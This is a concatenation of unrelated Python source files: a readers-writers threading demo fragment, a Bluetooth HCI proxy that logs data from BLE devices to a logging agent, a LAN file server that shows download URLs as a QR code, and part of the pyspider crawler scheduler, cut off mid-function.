cuarto_vacio.acquire()
mutex.release()
lee(id)
mutex.acquire()
lectores = lectores - 1
print("%d: Ya me voy, dejo %d lectores" % (id, lectores))
if lectores == 0:
cuarto_vacio.release()
print("%d: Dejo un cuarto vacío"% id)
mutex.release()
def lee(id):
print("El lector %d está leyendo..." % id)
sleep(0.3)
print("%d ya terminó de leer" % id)
def escribe(id):
print(" El escritor %d está escribiendo.." % id)
sleep(2)
print(" %d terminó de escribir" % id)
for escr in range(3):
threading.Thread(target = escritor, args = [escr]).start()
for lect in range(20):
threading.Thread(target = lector, args = [lect]).start()
|
ble_logger.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import atexit
import logging
import collections
import os
import pty
import select
import subprocess
from StringIO import StringIO
from io import SEEK_CUR
import json
import errno
from datetime import datetime, timedelta
import threading
from jumper_logging_agent.agent import \
Agent, DEFAULT_FLUSH_PRIORITY, DEFAULT_FLUSH_INTERVAL, DEFAULT_FLUSH_THRESHOLD, DEFAULT_EVENT_TYPE
from . import gatt_protocol
from .hci_channel_user_socket import create_bt_socket_hci_channel_user
from hci_protocol.hci_protocol import *
from .event_parser_middleware import EventParser, EventParserException
from . import __version__
JUMPER_DATA_CHARACTERISTIC_UUID = int('8ff456780a294a73ab8db16ce0f1a2df', 16)
JUMPER_TIME_CHARACTERISTIC_UUID = int('8ff456790a294a73ab8db16ce0f1a2df', 16)
DEFAULT_INPUT_FILENAME = '/var/run/jumper_ble_logger/events'
DataToSendToAgent = collections.namedtuple('DataToSendToAgent', 'mac_address payload boot_time')
class AgentEventsSender(object):
def __init__(self, filename=DEFAULT_INPUT_FILENAME, logger=None):
self._logger = logger or logging.getLogger(__name__)
self._filename = filename
self._fifo = self.open_fifo_readwrite(self._filename)
@staticmethod
def open_fifo_readwrite(filename):
if not os.path.exists(filename):
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
try:
os.mkfifo(filename)
except OSError as e:
if e.errno != errno.EEXIST:
raise
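# open the FIFO read-write and non-blocking: keeping a read end open ourselves means writes
# do not fail with ENXIO while the logging agent has not yet attached a reader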
fd = os.open(filename, os.O_RDWR | os.O_NONBLOCK)
return os.fdopen(fd, 'wb')
def send_data(self, data):
event = json.dumps(data).encode() + b'\n'
self._logger.debug('Sending event to agent')
self._fifo.write(event)
self._fifo.flush()
self._logger.info('Event sent to agent: %s', repr(event))
class HciProxy(object):
def __init__(self, hci_device_number=0, logger=None, events_config=None):
self._logger = logger or logging.getLogger(__name__)
self._event_parser = EventParser(config=events_config, logger=self._logger)
self._agent_events_sender = AgentEventsSender(logger=self._logger)
self._hci_device_number = hci_device_number
try:
subprocess.check_call(['hciconfig', self.hci_device_name, 'down'])
except subprocess.CalledProcessError:
self._logger.error('Could not run hciconfig down command for HCI device')
raise
self._hci_socket = create_bt_socket_hci_channel_user(hci_device_number)
self._logger.info('bind to %s complete', self.hci_device_name)
self._pty_master, pty_slave = pty.openpty()
self._pty_fd = os.fdopen(self._pty_master, 'rwb')
hci_tty = os.ttyname(pty_slave)
self._logger.debug('TTY slave for the virtual HCI: %s', hci_tty)
try:
subprocess.check_call(['hciattach', hci_tty, 'any'])
except subprocess.CalledProcessError:
self._logger.error('Could not run hciattach on PTY device')
raise
self._inputs = [self._pty_fd, self._hci_socket]
self._pty_buffer = StringIO() # Used as a seekable stream
self._gatt_logger = GattLogger(self._logger)
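# at this point the proxy sits between the kernel's HCI user-channel socket and the virtual PTY
# registered via hciattach; packets in both directions are handed to the GATT logger, which may
# forward, swallow or inject packets before they reach the other side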
self._should_stop = False
@property
def hci_device_name(self):
return 'hci{}'.format(self._hci_device_number)
def handle_packet(self, packet, source):
action = self._gatt_logger.handle_message(packet, source)
self._logger.debug('Action: %s', action)
for packet in action.packets_to_send_to_socket:
self._logger.debug(
'Sending to socket: %s',
RawCopy(HciPacket).parse(packet)
)
self._hci_socket.sendall(packet)
if source == 'socket' and len(action.packets_to_send_to_pty) == 0:
self._logger.debug('Skipping PTY')
for packet in action.packets_to_send_to_pty:
self._logger.debug(
'Sending to PTY: %s',
RawCopy(HciPacket).parse(packet)
)
os.write(self._pty_master, packet)
if action.data_to_send_to_agent is not None:
try:
parsed_data = self._event_parser.parse(
action.data_to_send_to_agent.mac_address,
action.data_to_send_to_agent.payload,
action.data_to_send_to_agent.boot_time
)
except EventParserException as e:
self._logger.warning('Error parsing packet from BLE device: %s', e)
else:
self._agent_events_sender.send_data(parsed_data)
def run(self):
try:
while not self._should_stop:
readable, _, _ = select.select(self._inputs, [], [], 1)
if self._hci_socket in readable:
source = 'socket'
packet = self._hci_socket.recv(4096)
self._logger.debug('SOCKET: %s', RawCopy(HciPacket).parse(packet))
self.handle_packet(packet, source)
if self._pty_fd in readable:
data = os.read(self._pty_master, 4096)
self._logger.debug('Raw PTY data: %s', repr(data))
self._pty_buffer.write(data)
self._pty_buffer.seek(-len(data), SEEK_CUR)
source = 'pty'
while True:
if self._pty_buffer.pos == self._pty_buffer.len:
break
parsed_packet = RawCopy(HciPacket).parse_stream(self._pty_buffer)
if not parsed_packet:
break
self._logger.debug('PTY: %s', parsed_packet)
packet = parsed_packet.data
self.handle_packet(packet, source)
except KeyboardInterrupt:
log.info("Received SIGTERM, exiting")
def stop(self):
self._should_stop = True
Action = collections.namedtuple(
'Action', 'packets_to_send_to_socket packets_to_send_to_pty data_to_send_to_agent'
)
def get_default_action(packet, source):
if source == 'socket':
return Action(packets_to_send_to_socket=[], packets_to_send_to_pty=[packet], data_to_send_to_agent=None)
elif source == 'pty':
return Action(packets_to_send_to_socket=[packet], packets_to_send_to_pty=[], data_to_send_to_agent=None)
class GattLogger(object):
def __init__(self, logger=None):
self._logger = logger or logging.getLogger(__name__)
self._peripherals_loggers = dict()
self._connection_handle_to_mac_map = dict()
def parse_hci_packet(self, packet):
try:
return RawCopy(HciPacket).parse(packet)
except:
self._logger.error('Exception during packet parsing')
return None
def handle_acl_data_packet(self, parsed_packet_with_raw_data, source):
connection_handle = get_connection_handle_from_acl_data_packet(parsed_packet_with_raw_data.value)
try:
mac_address = self._connection_handle_to_mac_map[connection_handle]
except KeyError:
self._logger.warning(
'Received ACL data packet for an unmapped connection handle: %d. \
This packet will be ignored by the logger', connection_handle
)
else:
try:
peripheral_logger = self._peripherals_loggers[mac_address]
except KeyError:
self._logger.warning(
'Received ACL data packet for a connection handle without a logger: %d. \
This packet will be ignored by the logger', connection_handle
)
else:
return peripheral_logger.handle_message(parsed_packet_with_raw_data, source)
def handle_num_of_completed_packets_event(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
new_connection_handles = []
new_number_of_completed_packets = []
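# packets injected by the proxy toward the controller must stay invisible to the host: subtract
# them from the completed-packets counts before rebuilding the event that is sent to the PTY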
for i in range(parsed_packet.payload.payload.number_of_handles):
connection_handle = parsed_packet.payload.payload.connection_handles[i]
try:
mac_address = self._connection_handle_to_mac_map[connection_handle]
except KeyError:
pass
else:
if mac_address in self._peripherals_loggers:
number_of_hidden_packets = \
self._peripherals_loggers[mac_address].reset_number_of_hidden_data_packets_to_sockets()
number_of_completed_packets = \
parsed_packet.payload.payload.number_of_completed_packets[i] - number_of_hidden_packets
if number_of_completed_packets != 0:
new_connection_handles.append(connection_handle)
new_number_of_completed_packets.append(number_of_completed_packets)
if len(new_connection_handles) > 0:
new_packet = build_number_of_completed_packets_event_packet(
new_connection_handles, new_number_of_completed_packets
)
return Action(
packets_to_send_to_socket=[],
packets_to_send_to_pty=[new_packet],
data_to_send_to_agent=None
)
def handle_command_status_event(self, parsed_packet_with_raw_data, source):
block_packet = False
for peripheral_logger in self._peripherals_loggers.values():
if peripheral_logger.awaiting_response:
block_packet = True
break
if block_packet:
return Action(
packets_to_send_to_socket=[],
packets_to_send_to_pty=[],
data_to_send_to_agent=None
)
def handle_le_connection_complete_event(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
mac_address, connection_handle = get_meta_data_from_connection_complete_event_packet(parsed_packet)
self._logger.info('Connected to device. MAC: %s Connection handle: %d', mac_address, connection_handle)
self._connection_handle_to_mac_map[connection_handle] = mac_address
if mac_address not in self._peripherals_loggers:
self._peripherals_loggers[mac_address] = \
GattPeripheralLogger(mac_address, self._logger)
self._peripherals_loggers[mac_address].on_connect(connection_handle)
return None
def handle_disconnection_complete_event(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
connection_handle = get_connection_handle_from_disconnection_complete_event_packet(parsed_packet)
self._logger.info('Disconnection event on handle: %d', connection_handle)
try:
mac_address = self._connection_handle_to_mac_map[connection_handle]
except KeyError:
self._logger.warning(
'Received disconnection event for an unmapped connection handle: %d', connection_handle
)
return None
del self._connection_handle_to_mac_map[connection_handle]
try:
self._peripherals_loggers[mac_address].on_disconnect()
except KeyError:
self._logger.warning(
'Received disconnection event for a connection handle without a logger: %d', connection_handle
)
return None
def handle_message(self, packet, source):
parsed_packet_with_raw_data = self.parse_hci_packet(packet)
action = None
if parsed_packet_with_raw_data is not None:
parsed_packet = parsed_packet_with_raw_data.value
if is_acl_data_packet(parsed_packet):
action = None or self.handle_acl_data_packet(parsed_packet_with_raw_data, source)
elif is_num_of_completed_packets_event(parsed_packet) and source == 'socket':
action = None or self.handle_num_of_completed_packets_event(parsed_packet_with_raw_data, source)
elif is_command_status_packet(parsed_packet):
action = None or self.handle_command_status_event(parsed_packet_with_raw_data, source)
elif is_le_connection_complete_event(parsed_packet):
action = None or self.handle_le_connection_complete_event(parsed_packet_with_raw_data, source)
elif is_le_disconnection_complete_event(parsed_packet) or is_disconnection_complete_event(parsed_packet):
action = None or self.handle_disconnection_complete_event(parsed_packet_with_raw_data, source)
return action or get_default_action(packet, source)
class GattPeripheralLogger(object):
def __init__(self, mac_address, logger=None):
self._logger = logger or logging.getLogger(__name__)
self._mac_address = mac_address
self._connection_handle = None
self._jumper_data_handle = None
self._jumper_time_handle = None
self.awaiting_response = False
self._queued_pty_packets = []
self._number_of_hidden_data_packets_to_socket = 0
self._state = None
self._boot_time = None
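# state machine: INIT (discover the jumper characteristic handles) -> TIME_SYNC (read time since boot)
# -> STARTING_NOTIFICATIONS (subscribe to data notifications) -> RUNNING (forward notifications to the
# agent); DISCONNECTED once the link drops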
def reset_number_of_hidden_data_packets_to_sockets(self):
result = self._number_of_hidden_data_packets_to_socket
self._number_of_hidden_data_packets_to_socket = 0
return result
def start_time_sync(self, packet):
self._state = 'TIME_SYNC'
self._logger.debug('State = %s', self._state)
self._number_of_hidden_data_packets_to_socket = self._number_of_hidden_data_packets_to_socket + 1
self.awaiting_response = True
self._logger.debug('Sending request for "time from boot"')
return Action(
packets_to_send_to_socket=[gatt_protocol.create_read_request_packet(
self._connection_handle, self._jumper_time_handle
)],
packets_to_send_to_pty=[packet],
data_to_send_to_agent=None
)
def on_connect(self, connection_handle):
self._connection_handle = connection_handle
self._jumper_data_handle = None
self._jumper_time_handle = None
self.awaiting_response = False
self._state = 'INIT'
self._boot_time = None
def on_disconnect(self):
self._state = 'DISCONNECTED'
def handle_message(self, parsed_packet_with_raw_data, source):
parsed_packet = parsed_packet_with_raw_data.value
packet = parsed_packet_with_raw_data.data
if self._state == 'INIT':
if is_read_by_type_response_packet(parsed_packet):
self._logger.debug('read by type response')
self._jumper_data_handle = \
self._jumper_data_handle or \
find_handle_in_read_by_type_response_packet(parsed_packet, JUMPER_DATA_CHARACTERISTIC_UUID)
self._jumper_time_handle = \
self._jumper_time_handle or \
find_handle_in_read_by_type_response_packet(parsed_packet, JUMPER_TIME_CHARACTERISTIC_UUID)
if self._jumper_data_handle and self._jumper_time_handle:
return self.start_time_sync(packet)
elif self._state == 'TIME_SYNC':
if source == 'socket' and is_read_response_packet(parsed_packet):
self._boot_time = \
datetime.utcnow() - timedelta(0, get_value_from_read_response_packet(parsed_packet))
self._state = 'STARTING_NOTIFICATIONS'
self._logger.debug('State = %s', self._state)
self._number_of_hidden_data_packets_to_socket = self._number_of_hidden_data_packets_to_socket + 1
self.awaiting_response = True
return Action(
packets_to_send_to_socket=[gatt_protocol.create_start_notifying_on_handle_packet(
self._connection_handle, self._jumper_data_handle
)],
packets_to_send_to_pty=[],
data_to_send_to_agent=None
)
elif source == 'pty':
self._logger.debug('Queuing PTY packet: %s', parsed_packet)
self._queued_pty_packets.append(packet)
return Action(packets_to_send_to_socket=[], packets_to_send_to_pty=[], data_to_send_to_agent=None)
elif self._state == 'STARTING_NOTIFICATIONS':
if source == 'socket' and is_write_response_packet(parsed_packet):
self._logger.info('Received write response packet')
self._logger.debug('Releasing queued PTY packets')
queued_pty_packets = list(self._queued_pty_packets)
self.awaiting_response = False
self._queued_pty_packets = []
self._state = 'RUNNING'
self._logger.debug('State = %s', self._state)
return Action(
packets_to_send_to_socket=queued_pty_packets, packets_to_send_to_pty=[], data_to_send_to_agent=None
)
elif source == 'pty':
self._logger.debug('Queuing PTY packet: %s', parsed_packet)
self._queued_pty_packets.append(packet)
return Action(packets_to_send_to_socket=[], packets_to_send_to_pty=[], data_to_send_to_agent=None)
elif self._state == 'RUNNING':
if self._is_jumper_notify_message(parsed_packet):
data_to_send_to_agent = DataToSendToAgent(
mac_address=self._mac_address,
payload=get_data_from_notify_message(parsed_packet),
boot_time=self._boot_time
)
self._logger.info('Received data from logger: %s', repr(data_to_send_to_agent))
return Action(
packets_to_send_to_socket=[], packets_to_send_to_pty=[], data_to_send_to_agent=data_to_send_to_agent
)
elif self._state == 'DISCONNECTED':
self._logger.warning('Received packet while disconnected: %s', parsed_packet)
return get_default_action(packet, source)
def _is_jumper_notify_message(self, parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_HANDLE_NOTIFY' and \
parsed_packet.payload.payload.payload.payload.handle == self._jumper_data_handle
def find_handle_in_read_by_type_response_packet(parsed_packet, characteristics_uuid):
for handle_value_pair in parsed_packet.payload.payload.payload.payload.attribute_data_list:
characteristic_declaration = gatt_protocol.parse_characteristic_declaration(handle_value_pair.value)
try:
if characteristic_declaration.uuid == characteristics_uuid:
return characteristic_declaration.value_handle
except ValueError:
pass
return None
def get_data_from_notify_message(parsed_packet):
return parsed_packet.payload.payload.payload.payload.data
def get_value_from_read_response_packet(parsed_packet):
return parsed_packet.payload.payload.payload.payload.value
def is_read_bd_address_command_complete_event_packet(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'COMMAND_COMPLETE' and \
parsed_packet.payload.payload.ogf == 'INFORMATIONAL_PARAMETERS' and \
parsed_packet.payload.payload.ocf == 'READ_BD_ADDRESS_COMMAND'
def is_read_by_type_response_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_READ_BY_TYPE_RESPONSE'
def is_read_response_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_READ_RESPONSE'
def is_acl_data_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET'
def get_connection_handle_from_acl_data_packet(parsed_packet):
return parsed_packet.payload.handle
def is_le_connection_complete_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'LE_META_EVENT' and \
parsed_packet.payload.payload.subevent == 'LE_CONNECTION_COMPLETED'
def get_meta_data_from_connection_complete_event_packet(parsed_packet):
return parsed_packet.payload.payload.payload.peer_bdaddr, parsed_packet.payload.payload.payload.handle
def is_le_disconnection_complete_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'DISCONNECTION_COMPLETED'
def is_disconnection_complete_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and \
parsed_packet.payload.event == 'DISCONNECTION_COMPLETE'
def get_connection_handle_from_disconnection_complete_event_packet(parsed_packet):
return parsed_packet.payload.payload.handle
def is_write_response_packet(parsed_packet):
return parsed_packet.type == 'ACL_DATA_PACKET' and \
parsed_packet.payload.payload.cid == ATT_CID and \
parsed_packet.payload.payload.payload.opcode == 'ATT_OP_WRITE_RESPONSE'
def is_num_of_completed_packets_event(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and parsed_packet.payload.event == 'NUMBER_OF_COMPLETED_PACKETS'
def is_command_status_packet(parsed_packet):
return parsed_packet.type == 'EVENT_PACKET' and parsed_packet.payload.event == 'COMMAND_STATUS'
def get_list_of_handle_and_num_of_completed_packets_pairs_from_num_of_completed_packets_event(parsed_packet):
result = []
for i in range(parsed_packet.payload.payload.number_of_handles):
result.append(
(
parsed_packet.payload.payload.connection_handles[i],
parsed_packet.payload.payload.number_of_completed_packets[i]
)
)
return result
def build_number_of_completed_packets_event_packet(connection_handles, number_of_completed_packets):
return HciPacket.build(
dict(
type='EVENT_PACKET',
payload=dict(
event='NUMBER_OF_COMPLETED_PACKETS',
payload=dict(
number_of_handles=len(connection_handles),
connection_handles=connection_handles,
number_of_completed_packets=number_of_completed_packets
)
)
)
)
def change_dictionary_keys_from_str_to_int(d):
return {int(k): v for k, v in d.items()}
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--flush-threshold', help='Number of events buffered until flushing', type=int, default=DEFAULT_FLUSH_THRESHOLD
)
parser.add_argument(
'--flush-priority', help='Event priority (integer) upon which to flush pending events', type=int,
default=DEFAULT_FLUSH_PRIORITY
)
parser.add_argument(
'--flush-interval', help='Interval in seconds after which pending events will be flushed', type=float,
default=DEFAULT_FLUSH_INTERVAL
)
parser.add_argument(
'--default-event-type', help='Default event type if not specified in the event itself', type=str,
default=DEFAULT_EVENT_TYPE
)
parser.add_argument(
'--events-config-file',
type=str,
help='Path of the events config file in JSON format.',
default='/etc/jumper_ble_logger/events_config.json'
)
parser.add_argument(
'--config-file',
type=str,
help='Path of the config file in JSON format.',
default='/etc/jumper_ble_logger/config.json'
)
parser.add_argument('--hci', '-i', type=int, default=0, help='The number of HCI device to connect to')
parser.add_argument('--verbose', '-v', action='count', help='Verbosity, call this flag twice for ultra verbose mode')
parser.add_argument('--log-file', '-l', type=str, default=None, help='Dumps log to file')
parser.add_argument('-d', '--dev-mode', help='Sends data to development BE', action='store_true')
args = parser.parse_args()
if args.verbose == 1:
logging_level = logging.INFO
elif args.verbose > 1:
logging_level = logging.DEBUG
else:
logging_level = logging.WARN
logging.basicConfig(format='%(asctime)s %(levelname)8s %(name)10s: %(message)s', level=logging_level)
logger = logging.getLogger(__file__)
logger.info('Jumper BLE Logger {}'.format(__version__))
if args.log_file is not None:
logger.addHandler(logging.FileHandler(args.log_file, mode='w'))
if not os.path.isfile(args.config_file):
print('Config file is missing: {}'.format(args.config_file))
return 3
with open(args.config_file) as fd:
try:
config = json.load(fd)
except ValueError:
print('Config file must be in JSON format: {}'.format(args.config_file))
return 4
try:
project_id = config['project_id']
write_key = config['write_key']
except KeyError as e:
print('Missing entry in config file: {}. {}'.format(args.config_file, e))
return 5
if not os.path.isfile(args.events_config_file):
print('Config file is missing: {}'.format(args.events_config_file))
return 1
with open(args.events_config_file) as fd:
try:
events_config = change_dictionary_keys_from_str_to_int(json.load(fd))
except ValueError:
print('Config file must be in JSON format: {}'.format(args.events_config_file))
return 2
print('Starting agent')
agent_started_event = threading.Event()
def on_listening():
print('Agent listening on named pipe %s' % (agent.input_filename,))
agent_started_event.set()
agent = Agent(
input_filename=DEFAULT_INPUT_FILENAME,
project_id=project_id,
write_key=write_key,
flush_priority=args.flush_priority,
flush_threshold=args.flush_threshold,
flush_interval=args.flush_interval,
default_event_type=args.default_event_type,
event_store=None,
on_listening=on_listening,
dev_mode=args.dev_mode
)
atexit.register(agent.cleanup)
logging_agent_thread = threading.Thread(target=agent.start)
logging_agent_thread.start()
agent_started_event.wait()
hci_proxy = HciProxy(args.hci, logger, events_config)
try:
hci_proxy.run()
except KeyboardInterrupt:
pass
agent.stop()
logging_agent_thread.join()
agent.cleanup()
print('Exiting')
return 0
if __name__ == '__main__':
x = main()
exit(x)
|
servefiles.py | import atexit
import os
import sys
import tempfile
import threading
import urllib
import netifaces
import qrcode
from PIL import ImageTk
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from Tkinter import Tk, Frame, Label, BitmapImage
from urlparse import urljoin
from urllib import pathname2url, quote
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from tkinter import Tk, Frame, Label, BitmapImage
from urllib.parse import urljoin, quote
from urllib.request import pathname2url
if len(sys.argv) < 2:
print("Please specify a file/directory.")
sys.exit(1)
directory = sys.argv[1]
if not os.path.exists(directory):
print(directory + ": No such file or directory.")
sys.exit(1)
print("Preparing data...")
baseUrl = netifaces.ifaddresses(netifaces.gateways()['default'][netifaces.AF_INET][1])[2][0]['addr'] + ":8080/"
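# use the IPv4 address of the default-gateway interface so devices on the same LAN can reach the
# HTTP server started below on port 8080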
qrData = ""
if os.path.isfile(directory):
if directory.endswith(('.cia', '.tik')):
qrData += baseUrl + quote(os.path.basename(directory))
directory = os.path.dirname(directory)
else:
for file in [ file for file in next(os.walk(directory))[2] if file.endswith(('.cia', '.tik')) ]:
qrData += baseUrl + quote(file) + "\n"
if len(qrData) == 0:
print("No files to serve.")
sys.exit(1)
if not directory == "":
os.chdir(directory)
print("")
print("URLS:")
print(qrData)
print("")
print("Generating QR code...")
try:
qrImage = qrcode.make(qrData, box_size=5)
except qrcode.exceptions.DataOverflowError:
print("Error: URL list too large for a QR code. Try reducing file name lengths or the number of files to send.")
sys.exit(1)
print("Opening HTTP server on port 8080...")
server = TCPServer(("", 8080), SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
atexit.register(server.shutdown)
print("Displaying QR code...")
root = Tk()
root.title("QR Code")
frame = Frame(root)
frame.pack()
qrBitmap = ImageTk.PhotoImage(qrImage)
qrLabel = Label(frame, image=qrBitmap)
qrLabel.pack()
root.mainloop()
print("Shutting down HTTP server...")
server.shutdown()
|
scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
'''
'''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
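        # self._paused holds one of: False (running), True (paused), 'checking' (probing recent results after PAUSE_TIME)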
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
if 'process' not in task['track']:
logger.error('process not in task, %r', task)
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
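        # a changed script md5 (or a pending info request) means runtime info must be refreshed from the processor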
if (self.md5sum != md5sum or self.waiting_get_info) and self.active:
self._send_on_get_info = True
self.waiting_get_info = True
self.md5sum = md5sum
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
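    # retry delay in seconds, keyed by how many times the task has already been retried; '' is the fallback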
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 10
PAUSE_TIME = 5*60
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
    STATUS_PACK = 2  # currently not used
    REQUEST_PACK = 3  # currently not used
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
# update project runtime info from processor by sending a _on_get_info
# request, result is in status_page.track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
        # load the task queue when the project is running and drop it when the project is stopped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
'''
return False if any of 'taskid', 'project', 'url' is not in task dict
        or the task's project is not registered with the scheduler
'''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
